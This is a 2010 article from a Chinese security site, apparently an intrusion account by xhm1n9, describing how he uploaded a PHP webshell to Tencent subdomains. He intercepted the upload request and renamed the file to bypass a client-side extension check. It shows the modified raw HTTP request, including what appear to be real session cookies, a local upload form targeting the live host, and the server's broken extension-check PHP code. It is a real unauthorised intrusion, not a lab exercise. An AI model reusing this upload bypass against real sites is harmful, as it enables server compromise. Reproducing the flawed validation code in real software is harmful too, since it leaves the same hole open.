首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
八卦下tx分站被黑
来源:vfocus.net 作者:xhm1n9 发布时间:2010-03-31  

by:xhm1n9

2010.3.29

 

      最近腾讯分站被“黑”的消息有蛮人多关注的,某带头大哥就叫我写了篇贴子说说相关的过程是怎样的,进入正题!

                   

      大家都想像得到要黑腾讯这类大站找个明显的漏洞(包括注入)是很难的了,就算注入出密码肯定也加密了,解开了都不一定能找到后台拿shell,必境人家也是有相关的安全部门维护着!上传?除了后台哪里还有?我通过google搜,到处转了转看到腾讯某分站搞了个类似在线做动画的服务,当然前提是要登陆了才行,其中有个功能就是上传你的作品!这个地方能用?不限制上传类型?不试怎么知道!直接上php后缀的马不行,它是用js来控制的,只有jpg,bmp,gif后缀才能显视且才会开始上传。还有什么办法没?那就试试抓包再改后缀喽!内容如下:

       

POST /games/412/upload.php HTTP/1.1

Accept: text/*

Content-Type: multipart/form-data; boundary=----------Ij5Ij5gL6ae0Ef1cH2ei4ae0GI3GI3

User-Agent: Shockwave Flash

Host: xxx.qq.com

Content-Length: 69591       //注意修改后的字数

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: pgv_info=ssid=s1553263453&SPATHTAG=vip.qq.com/|NONE_REF; actwebinfo=1; qqactwebinfo=1; verifysession=7348bade52bad59bd71f3e368fb90efe261cd975f2632c49f622f5e7c95deb1fb0135e2f626632e0; uin=o0032182106; skey=@FXSiKBprF; qv_swfrfh=**********省略n多无关内容!

 

------------Ij5Ij5gL6ae0Ef1cH2ei4ae0GI3GI3

Content-Disposition: form-data; name="Filedata"; filename="php.php.jpg" //我们去掉.jpg试试

Content-Type: application/octet-stream

.............................................//省略无关内容

 

结果成功得到php后缀的shell地址,今天人品真不错,这样的漏洞都让我遇到,但是我有注意到域名和上传的页面并不一样,是yyy.qq.com的,进去后发现原来它跟目录下也有个上传文件upload.php,就拖了些相关文件和目录下来分析分析并写了个本地上传方便一些:

 

<form name="upload_form" action="http://yyy.qq.com/upload.php" method="post" enctype="multipart/form-data">

<input type="hidden" name="upfrom" value="flash" />

请选择文件:

<input name="Filedata" type="file" />

<input type="submit" value="go" />

</form>

 

下面我们来看看yyy.qq.com/upload.php这个文件

 

............//省略无关代码

$file_id = md5($_FILES["Filedata"]["tmp_name"] + rand()*100000);

 

$file_ext = get_file_ext($_FILES["Filedata"]["name"],$allow_ext);     //注意

 

$filename = $upload_dir.'/'.$fileFolder.'/'.$file_id.'.'.$file_ext;

...........//

elseif($upfrom == 'flash'){

        if(!$file_ext){

                header("HTTP/1.1 500 Internal Server Error");

                echo "bbb";

                exit(0);

        }

 

        if (!isset($_FILES["Filedata"]) || !is_uploaded_file($_FILES["Filedata"]["tmp_name"]) || $_FILES["Filedata"]["error"] != 0) {

                header("HTTP/1.1 500 Internal Server Error");

                echo "qqq";

                exit(0);

        }

 

        if(!move_uploaded_file($_FILES["Filedata"]["tmp_name"],$filename)){

                header("HTTP/1.1 500 Internal Server Error");

                echo "ccc";

                exit(0);

        }

............//上面代码用了get_file_ext()我接再跟下去看看;

 

function get_file_ext($filename,$exts = ''){

        if(!$file_ext = strrchr($filename,'.')){

                return false;

        }

        $file_ext = substr(strtolower($file_ext),1);

        if($exts){

                $arr = explode('|',$exts);

                if(!in_array($file_ext,$arr)){

                        return false;

                }

        }

        return $file_ext;

}

可以看到此函数有叛断后缀是否为$exts里所允许的,但我发现代码里并没有定义$exts变量,也就是为空,所以跳过检查了,直接返回上传时的文件后缀!

 

   后来皇子牛跟我说他发现xxx.qq.com提供的服务里还能上传头像也能通过上面的方法拿shell,地址就是xxx.qq.com/xxx.php,真没想到一时之间还两个分站有问题,我觉得到这里基本可以确定两分站的漏洞原因都是如上所说.

   事后发现上传shell后没过多久就不见了,就怀凝是不是被发现了,跟皇子牛交流下后认为负载的可能性大些.

   费话了这么久主要原因还是我们的运气好,不然分站也不是这么容易就可拿shell的:)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·著名国际黑客站点zone-h.org被黑
·总结搜索型手工注入的全过程(不
·阿江统计系统拿WebShell
·Discuz! v7.2 注入漏洞分析与利
·Uchome <=2.0 后台GetWebShell漏
·无线网络渗透之旅
·数字战场:VPN隧道攻击
·重建sp_makewebtask存储过程获取
·突破XSS字符数量限制执行任意JS
·内网渗透案例
·xxbing的一次日站过程
·最新DVBBS8.0以上版本后台拿webs
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved